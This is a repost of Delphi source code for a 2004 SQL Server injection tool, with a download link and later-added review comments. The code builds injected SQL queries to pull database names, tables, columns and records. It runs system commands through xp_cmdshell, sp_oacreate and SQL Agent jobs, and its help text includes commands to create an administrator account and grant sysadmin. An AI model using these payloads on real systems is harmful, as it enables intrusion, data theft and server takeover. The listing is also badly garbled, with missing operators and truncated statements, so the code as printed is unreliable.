SQL Server Injection Tool 1.0


SQL Server Injection Tool 1.0

Uses a SQL Server injection vulnerability to retrieve the database name, table names, field names and records. Because of network speed, only the first 5 field values of each record can be guessed. It also implements three ways of executing system commands, and the command output can be displayed.

This program is only for testing and research; the author accepts no responsibility for the consequences of using it, and because it was written in a hurry the code inevitably has flaws.

Download address: http://free.efile.com.cn/hnxyy/nbsi.exe

Author: Hnxyy QQ: 19026695

2004.12.16 Beijing

Firefox Technology Exchange Forum http://www.wrsky.com Temporary Access Address http://firefoxer.nease.net It Is All Beginnings Free It Is All Ruin to Be Privately Owned 7 Original Code: Unit UntMain

Interface

uses Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms, Dialogs, StdCtrls, idHttp, IdBaseComponent, IdComponent, IdTCPConnection, IdTCPClient, OleCtrls, SHDocVw, mshtml;

// TForm1: the single form.  Inputs are EdtUrl (the URL every probe is built on)
// and EdtCommand; EdtMuliCase/EdtQuery/EdtUser/EdtPower/EdtDbName and Memo1 show
// enumeration results, Memo2 shows command output, wb (TWebBrowser) renders the
// probe responses that GetWBMsg reads.  Private state: tag (set by
// wbDocumentComplete, polled by GetWBMsg), isFinish (set by BtnStopClick) and
// isCancel (set by BtnCancelClick).  `S ender` in FormShow is an extraction typo.
type TForm1 = class (TForm) Label1: TLabel; EdtUrl: TEdit; BtnCheck: TButton; Label2: TLabel; GroupBox1: TGroupBox; Label7: TLabel; Label3: TLabel; Label4: TLabel; Label5: TLabel; Label6: TLabel; EdtMuliCase: TEdit ; EdtQuery: TEdit; EdtUser: TEdit; EdtPower: TEdit; EdtDbName: TEdit; Memo1: TMemo; GroupBox2: TGroupBox; cbDisp: TCheckBox; EdtCommand: TEdit; rbCmd: TRadioButton; rbOA: TRadioButton; btnExecute: TButton; GroupBox3: TGroupBox; Memo2 : TMemo; wb: TWebBrowser; BtnStop: TButton; rbJob: TRadioButton; btnCancel: TButton; procedure BtnCheckClick (Sender: TObject); procedure BtnExecuteClick (Sender: TObject); procedure wbDocumentComplete (Sender: TObject; const pDisp: IDispatch; var URL: OleVariant); procedure BtnStopClick (Sender: TObject); procedure rbCmdClick (Sender: TObject); procedure rbOAClick (Sender: TObject); procedure rbJobClick (Sender: TObject); procedure FormShow (S ender: TObject); procedure BtnCancelClick (Sender: TObject); private {Private declarations} tag: integer; isFinish, isCancel: boolean; function Get (URL: string): boolean; function GetWBMsg (URL: string): string; Function StrToNChar (DBNAME, TNAME: STRING): String; Procedure setrdbcheck (rd: tradiobutton); public {public declarations} End; var form1: tform1;

IMPLEMENTATION

{$ R * .dfm}

// BtnCheckClick: enumeration handler for the "Check" button.
// Every probe is a GET whose query string is the URL from EdtUrl plus an
// appended SQL fragment (`%20and%20...`, `;DECLARE ...`, trailing `--`).
// Get() treats an HTTP 200 as "true"; GetWBMsg() reads a value back from the
// text between two '|' (char(124)) markers in the rendered page.  Results go
// to the Edt* fields and Memo1; isFinish (set by BtnStopClick) ends the loops.
// Flow as printed: multi-statement and sub-query support checks, current user,
// is_srvrolemember() loop over PowerStr, @@version, db_name(); then for up to
// 1000 tables (sysobjects, xtype = char(85)) up to 1000 columns (syscolumns,
// id filtered through StrToNChar), a row count, and apparently the first
// vFieldCount (= 5) column values of each row.
// NOTE(review): the listing is extraction-garbled — string concatenation
// operators are dropped throughout and several statements are truncated
// (e.g. `if j 0; - ');` and `While K 0; - ');`), so it does not compile as
// printed and the lost text cannot be reconstructed from this page.
// Defender's view: the oracle is a status-code difference plus the page
// echoing database error text (presumably a conversion error around the '|'
// markers).  Uniform error responses and parameterised queries remove both
// channels; the fragments above appear literally in web-server access logs.
procedure TForm1.BtnCheckClick (Sender: TObject); const vFieldCount = 5; PowerStr: array [0..6] of string = ( 'sysadmin', 'dbcreator', 'diskadmin', 'processadmin', 'serveradmin', 'setupadmin ',' securityadmin '); var Url, DbName, TName, TName0, ColName, ColName0, NCharStr: string; i, j, k, iCount: integer; verStr, valueStr, CountStr, Powers: string; FieldStr, FieldOrdStr, CFieldStr: String; vfield: olevariant; begin try edtmulicase.text: = '; edtquery.text: ='; edtuser.text: = '; edtpower.text: ='; edtdbname.text: = '; URL: = trim (edturl.text); isfinish: = false; vfield: = varRaycreate ([0, vfieldcount-1], varvariant); memo1.clear; screen.cursor: = cr HOURGLASS; // Decision Support multiple query if get (URL '; DECLARE% 20 @ a% 20INT -') Then Begin edtmulicase.text: = 'Support'; ELSE BEGIN EDTMULICASE.TEXT: = 'does not support'; END; // Judgment whether the child query IF GET (URL '% 20And% 20 (SELECT% 20count (1)% 20From% 20 [sysobjects])> = 0') Then Begin edtquery.text: = 'Support'; Else Begin Edtque Ry.Text: = 'does not support'; end; // get the current user EDTUSER.TEXT: = getWBMSG (URL '% 20and% 20CHAR (124)% 2buser% 2bchar (124) = 0'); // Get the current user Sign in server role member for i: = 0 to high (power) do begin if get (URL '% 20and% 20cast (is_srvrolemember (' '' PowerSTR [i] '')% 20AS% 20VARCHAR (1)) = 1 ') THEN BEGIN POWERS: = PowerS PowerSTR [I] ' | '; end; end; if PowerS =' 'TEN EDTPOWER.TEXT: =' Unknown '

Else Edtpower.Text: = PowerS; / / Indicates if the current user is a member of the DB_OWNER fixed database role {if Get (is_member ('' 'db_owner')% 20AS% 20VARCHAR (1)) = 1 ') The begin edtpower.text: =' db_owner '; end else begin edtpower.text: =' unknown '; end;} // get the current SQL Server version number VERSTR: = getWBMSG (URL '% 20and% 20CHAR (124 )% 2b @@ version% 2bchar (124)> 0 '); memo1.lines.add (' Current version number: ' verstr); memo1.lines.add (' '); // get database name dbname: = GetWBMSG (URL '% 20and% 20CHAR (124)% 2BDB_NAME ()% 2bchar (124) = 0'); edtdbname.text: = dbname; if (dbname = ') or (dbname =' unknown ') THEN Begin Memo1 .LINES.ADD ('unknown database, operation termination!'); Exit; end; memo1.Lines.add ('Current Database:' DBNAME); btnStop.visible: = true; btncheck.visible: = false; / / Guess the table name Memo1.Lines.Add (''); memo1.lines.add ('Start guessing table name .....); memo1.lines.add (' ######## ################); for i: = 1 to 1000 do begin tname: = ''; TNAME: = getWBMSG (URL '% 20And% 20 (SELECT% 20top% 201 % 20CAST (CHAR (124)% 2BNAME% 2Bchar (124)% 20AS% 20Varchar (8000)) ' '% 20FROM (SELECT% 20top% 20' INTSTOSTR (i) '% 20ID, NAME% 20FROM% 20 [' DBNAME '] .. [sysobjects]' '% 20where% 20XTYPE = CHAR (85)% 20ORDER % 20BY% 20ID)% 20T% 20DER% 20BY% 20ID% 20DESC)> 0; - '); if (tname0 = tname) or (isfinish) Then Break; memo1.lines.add (' Name: ' TNAME ); // guess the column Memo1.Lines.Add (''); memo1.lines.add ('Start goueting column name .....);

Memo1.Lines.Add ('#################); ncharstr: ='; ncharstr: = strtonchar (dbname, tname); J : = 1; While J <1000 Do Begin ColName: = '; ColName: = GetWBMSG (URL '% 20And% 20 (SELECT% 20top% 201% 20cast (char (124)% 2BNAME% 2bchar (124) ' ' % 20AS% 20Varchar (8000))% 20From% 20 (select% 20top% 20 ' INTOSTR (J) % 20Colid, Name' '% 20FROM% 20 [' DBNAME '] .. [Syscolumns]% 20where % 20ID% 20 =% 20 ' ncharstr '% 20ORDER% 20BY% 20Colid)% 20t% 20ORDER% 20BY% 20Colid% 20DESC)> 0; - '); if (colname0 = colname) or (isfinish) THEN J: = 1000 else begin memo1.lines.add ('column name' INTOSTR (J) ':' colname); if j 0; - '); try iCount: = start (countstr); Except memo1.lines.add (' accident data, the operation is terminated! '); Exit; end; memo1.lines.add (' Table ' TNAME ': total '

CountStr 'strip data. '); Cfieldstr: =' '; fieldStr: ='; Fieldordstr: = '; fork: = 0 to vfieldcount-1 do begin if k = 0 Then Begin cfieldstr: =' Isnull ([' vfield [0] ']% 20VARCHAR (8000)), char (32))'; FieldStr: = '[' vfield [0] ']'; FieldordStr: = '[' vfield [0] ']% 20Desc'; END ELSE BEGIN CFIELDSTR: = CFIELDSTR '% 2B% 20% 2Bisnull (Cast ([' vfield [k] ']% 20AS% 20Varchar (8000)), char (32))'; FieldStr : = FieldStr ', [' Vfield [K] ']'; FieldordStr: = FieldORDSTR ', [' Vfield [k] ']% 20Desc'; end; end; k: = 1; While K 0; - ');

IF iSFINISH TEN K: = ICOUNT 1; Memo1.Lines.Add ('Data' INTOSTR (K) ':' VALUESTR); INC (K); End; Memo1.Lines.Add ('#### #############); memo1.lines.add ('data guess end .....); memo1.lines.add (' ') TNAME0: = TNAME; End; memo1.Lines.add ('########################################################################################################################################################### Guess the end ..... '); Finally Screen.cursor: = crdefault; btnStop.visible: = false; btncheck.visible: = true; end;

// BtnExecuteClick: sends the text in EdtCommand to the server through one of
// three routes, chosen by the radio buttons: rbCmd -> master..xp_cmdshell with
// output captured in a temp table [command_tmp] and read back one row per
// GetWBMsg call; rbOA -> sp_oacreate/sp_oamethod, only if the
// is_srvrolemember('sysadmin') probe returns true; rbJob -> an SQLServerAgent
// job (xp_servicecontrol start, sp_add_job/sp_add_jobstep/sp_start_job).
// The command is URL-encoded by the two StringReplace calls ('%' and space
// only).  isCancel (set by BtnCancelClick) stops the result-reading loop.
// NOTE(review): garbled as printed — concatenation operators are missing, and
// the commented-out first xp_cmdshell variant and the CountStr query are
// truncated; not reconstructable from this page.
// Defender's view: every route depends on the web application's database login
// holding sysadmin-level rights (in a default configuration xp_cmdshell and the
// Ole Automation procedures are sysadmin-only).  A least-privilege login, those
// procedures left disabled, and SQL Server Agent not running stop all three;
// the procedure names above are direct audit / WAF signatures.
procedure TForm1.BtnExecuteClick (Sender: TObject); var Url, DbName, CommandStr: string; ResultStr, CountStr: string; iCount, i: integer; begin try Url: = trim (EdtUrl.Text); ResultStr: = ''; CommandStr : = '; Iscancel: = false; commandstr: = trim (edtcommand.text); CommandStr: = StringReplace (CommandStr,'% ','% 25 ', [RFREPLACEALL]); CommandStr: = StringReplace (CommandStr,' ' , '% 20', [RFREPLACEALL]); memo2.clear; screen.cursor: = cr HOURGLAS; // acquired database name dbname: = getWBMSG (URL '% 20and% 20CHAR (124)% 2BDB_NAME ()% 2bchar (124) = 0 '); if (dbname =') or (DBNAME = 'unknown') Then Begin memo2.Lines.Add ('unknown database, operation termination!'); Exit; end; // cmd_shell // use xp_cmdshell To run the system command if rbcmd.checked the begin // = true; btnexecute.visible: = false; // The first method // Save the result of the command to one In the local file, then write the content of this file to the new temporary table for output {CommandStr: = URL '; EXEC% 20MASTER..' COMMDSHELL% 20 '' ' COMMANDSTR '> C: /command_tmp.log '' ' '; Drop% 20table% 20 [command_tmp]' '; Create% 20table% 20 [command_tmp] ([Resulttxt]% 20 voltor (7996)% 20null)' '; Bulk% 20insert% 20 [' DBNAME ']. [Command_tmp]% 20FROM% 20''c: /command_tmp.log ''% 20with% 20 (Keepnulls) ' '; ALTER% 20Table% 20 [Command_TMP]% 20ADD% 20 [ID]% 20INT% 20NOT% 20NULL % 20IDENTITY% 20 (1, 1) - ';

// Second approach, directly write the result of the command to the output, the efficiency is higher to CommandStr: = URL '; DROP% 20table% 20 [command_tmp];' 'create% 20table% 20 [command_tmp] ID]% 20INT% 20Not% 20null% 20Identity% 20 (1, 1), ' '% 20 [Resulttxt]% 20NULL); ' ' INSERT% 20NTO% 20 [command_tmp] (Resulttxt)% 20EXEC% 20MASTER.. '' ' CommandStr ' '' '' '' '' ' CommandStr ' '; INSERT% 20InTO% 20 [Command_TMP]% 20VALUES% 20 (' 'g_over' ') -';

IF GET (CommandStr) THEN Begin CountStr: = getWBMSG (URL '% 20 -% 2Bcast (20)' '% 2bchar (124)% 20FROM (124)% 20ROM (124)% 20FROM % 20 [Command_TMP]% 20where% 201 = 1)> 0; - '); try iCount: = start (countstr); Except Memo2.Lines.Add (' Unexpected data, operation termination! '); End; end; For i: = 1 to iCount Do Begin Resultstr: = '; Resultstr: = getWBMSG (URL '% 20And% 20 (SELECT% 20top% 201% 20case% 20When% 20ResulttxtXt% 20then% 20null ' '% 20then% 20CHAR (32)% 20ELSE% 20CHAR (124)% 2BRESULTTXT% 2Bchar (124) ' '% 20ED% 20FROM% 20 [command_tmp]% 20where% 20 ID = ' INTOSTR (i) ') = 0; - ') If ISCANCEL THEN BREAK; if (ResultStr <> 'unknown') THEN Memo2.Lines.Add (ResultStr); end; end; if get (URL '; DROP% 20table% 20 [Command_TMP ] - ') The begin Memo2.Lines.Add (' Command Completion '); end; end else begin commandstr: = url '; EXEC% 20MASTER.. '' COMMANDSTR '' '-'; if Get (Commandstr) THEN MEMO2.LINES.ADD ('Command Execute it.

'); End; end; // oacreate // Use sp_oacreate to run the system command if rboa.checked the begin // Indicate whether the current user is a member IF GET (URL '% 20and% 20CAST (IS_SRVROLEMEMBER (') of the Sysadmin fixed server role 'sysadmin' ')% 20AS% 20Varchar (1)) = 1') Then Begin Commandstr: = URL '; USE% 20' DBNAME '; declare% 20 @ O% 20INT; EXEC% 20' 'sp_oacreate% 20 '' wscript.shell ', @ o% 20Out; EXEC% 20' 'sp_oamethod% 20 @ O,' 'Run' ', NULL,' 'CMD% 20 / C% 20' CommandStr '' - '; If Get (CommandStr) Then Memo2.Lines.Add ('); END ELSE BEGIN MEMO2.LINES.ADD ('member of only the sysadmin fixed server role can perform sp_oacreate.

'); EXIT; END; END; // JOB // Use SQLServerAgent's job to run system command if rbjob.checked the begin // Start SQLSerVERAGENT IF GET (URL '; EXEC% 20master "xp_servicecontrol% 20'Start ' ',' 'Sqlservergent' '; -') Then Begin Memo2.Lines.add ('SQLServerAgent Successful!'); CommandStr: = URL '; USE% 20' DBNAME '; EXEC% 20sp_delete_JOB% 20null,' ' X '' ' '; EXEC% 20sp_add_job% 20' '' '' ' '; EXEC% 20sp_add_jobstep% 20null, '' '', ',' 'cmdexec', '' CMD % 20 / C% 20 ' CommandStr ' '; EXEC% 20sp_ADD_JOBSERVER% 20NULL,' '' ', @@ Servername' '; EXEC% 20SP_Start_JOB% 20'' '' - '; if Get (CommandStr) "The Memo2.Lines.Add ('); END ELSE BEGIN MEMO2.LINES.ADD (' SQLServerAgent failed, operation termination! '); exit; end; end; finally screen.cursor: = crdefault; BTNEXECUTE.Visible: = true; btncel.visible: = false; end;

// Get: one boolean probe.  Fetches URL with a TIdHTTP (redirects followed,
// ReadTimeout 30000 ms) and returns true only when the response code is 200;
// every exception is swallowed (the MessageBox is commented out), so a timeout
// or connection error reads as "false" exactly like a server error page.
// GetWBMsg: loads URL in the embedded TWebBrowser, spins
// Application.ProcessMessages until wbDocumentComplete sets tag <> 0, then
// returns the text between the first pair of '|' in body.innerText (nested
// GetResultStr), or 'unknown' when there is none.
// NOTE(review): the wait loop has no timeout — if DocumentComplete never fires
// the call never returns.  GetWBMsg's closing `end;` and a stray `Ind> 0`
// (IEND) are extraction damage.
// Defender's view: a value only reaches the client if the page prints the
// database error text (presumably a conversion error around the '|' markers);
// a generic error page with a consistent status removes the channel Get and
// GetWBMsg both depend on.
Function TFORM1.GET (URL: STRING): Boolean; var IDHTTP: TIDHTTP; SS: STRING; begin result: = false; idHttp: = tidHttp.create (nil); try idhttp.handleredirects: = true; // must support Redirection, otherwise Idhttp.ReadTimeout: = 30000; // More than this time no longer access SS: = IDHTTP.GET (URL); if idhttp.responsecode = 200 Then Result: = true; Except // on E: Exception Do // Application.MessageBox (Pchar ('has an exception, termination!' # 10 # 13 E.MESSAGE), 'Tip', MB_OK MB_ICONICONFORMATION); end; finary iDHTTP.Free; end; end; function tform1 .GETWBMSG (URL: String): String; Function GetResultStr (str: string): string; var iStart, IEND: Integer; ss: string; begin iStart: = POS ('|', str); if iStart> 0 THEN BEGIN SS: = COPY (STR, ISTART 1, Length (Str) -istart); IEND: = POS ('|', SS); if Ind> 0 THEN BEGIN SS: = Copy (SS, 1, IEND-1) End; end; if ss = '' Then Result: = 'unknown' else result: = ss; end; var ss: string; begin tag: = 0; wb.navigate (URL); WHI Le (tag = 0) Do Application.ProcessMessages; ss: = (wb.document as htmldocument2) .Body.innertext; Result: = GetResultStr (ss);

// StrToNChar: renders DbName + '..' + TName as object_id(nchar(n)%2bnchar(n)...),
// one nchar() per character code, so the object name is never sent literally;
// BtnCheckClick uses the result as the syscolumns id filter.
// NOTE(review): `beginiff` and `INTOSTR` are extraction damage; concatenation
// operators are missing as printed.
// Defender's view: a keyword blocklist on table names will not see this
// encoding, which is why input filtering is no substitute for parameterised
// queries.
Function TFORM1.STRTONCHAR (DBNAME, TNAME: STRING): String; Var i: integer; ss, str: string; begin ss: = dbname '..' tname; for i: = 1 to length (ss) do beginiff I = 1 Then str: = 'nchar (' INTTOSTR (ORD (SS [i])) ')' Else Str: = Str '% 2bnchar (' INTOSTR (ORD (SS [i])) ') '; End; Result: =' Object_ID (' Str ') '; END;

// wbDocumentComplete: TWebBrowser completion event; sets tag := 1, the signal
// GetWBMsg busy-waits for.  (The commented-out Memo2.Text line and the code
// after it were collapsed onto one line by extraction, so as printed the `//`
// swallows the rest of the statement.)
// BtnStopClick: sets isFinish, which the enumeration loops in BtnCheckClick
// test, and swaps the Stop/Check buttons back.  Its closing `end;` is lost.
procedure TForm1.wbDocumentComplete (Sender: TObject; const pDisp: IDispatch; var URL: OleVariant); begin //Memo2.Text: = (wb.Document as IHTMLDocument2) .Body.innerText; tag: = 1; end; procedure TForm1. BTNSTOPCLICK (Sender: TOBJECT); Begin isfinish: = true; btncheck.visible: = true; btnstop.visible: = false;

// SetRdbCheck: clears Memo2 and writes the help text for the selected
// execution mode (rbCmd / rbOA / rbJob); for the OA and Job modes it also
// disables cbDisp.  Called from the radio-button click handlers and FormShow.
// NOTE(review): garbled as printed (`the beginning;`, `rbjob1`).
Procedure tform1.setrdbcheck (rd: tradiobutton); begin memo2.clear; if rd = rbcmd the beginning; memo2.lines.add ('Using xp_cmdshell to run system command'); memo2.lines.add ( ''); Memo2.Lines.Add ('Net User Test Test / Add'); Memo2.Lines.Add ('Net Localgroup Administrators Test / Add'); Memo2.Lines.Add ('Exec Master..np_addlogin Test, Test '); Memo2.Lines.Add (' exec master..sp_addsrvrolemember test, sysadmin '); end; if rd = rboa the begin cbdisp.Enabled: = false; memo2.lines.add (' Using sp_oacreate to run system command '); End; if rd = rbjob1 begin cbdisp.enabled: = false; memo2.lines.add (' Using SQLServerAgent Job to run system command '); Memo2.Lines.Add (' Please start SQLServerAgent first using the following statement : '); Memo2.Lines.Add (' '); memo2.lines.add (' http://x.com/x.asp?a=1 ;ec master..xp_serviceControl '' Start ',' ' SQLSERVERAGENT '' '; -'); end; end;

// rbCmdClick: the xp_cmdshell radio button was selected; refresh the mode help
// text in Memo2 through the shared SetRdbCheck helper.
procedure TForm1.rbCmdClick(Sender: TObject);
begin
  SetRdbCheck(rbCmd);
end;

// rbOAClick: the sp_oacreate radio button was selected; refresh the mode help
// text in Memo2 through the shared SetRdbCheck helper.
procedure TForm1.rbOAClick(Sender: TObject);
begin
  SetRdbCheck(rbOA);
end;

// rbJobClick: the SQLServerAgent-job radio button was selected; refresh the
// mode help text in Memo2 through the shared SetRdbCheck helper.
procedure TForm1.rbJobClick(Sender: TObject);
begin
  SetRdbCheck(rbJob);
end;

// FormShow: on first display, initialise Memo2 as if the xp_cmdshell mode
// (rbCmd) were selected, so the help text matches the default radio button.
procedure TForm1.FormShow(Sender: TObject);
begin
  SetRdbCheck(rbCmd);
end;

// BtnCancelClick: sets isCancel, which BtnExecuteClick's result-reading loop
// tests, and swaps the Execute/Cancel buttons back.
// NOTE(review): garbled as printed (`btncelclick`, `btnce; visible`).
Procedure tForm1.btncelclick (sender: TOBJECT); Begin ISCANCEL: = true; btnexecute.visible: = true; btnce; visible: = false; end; end;

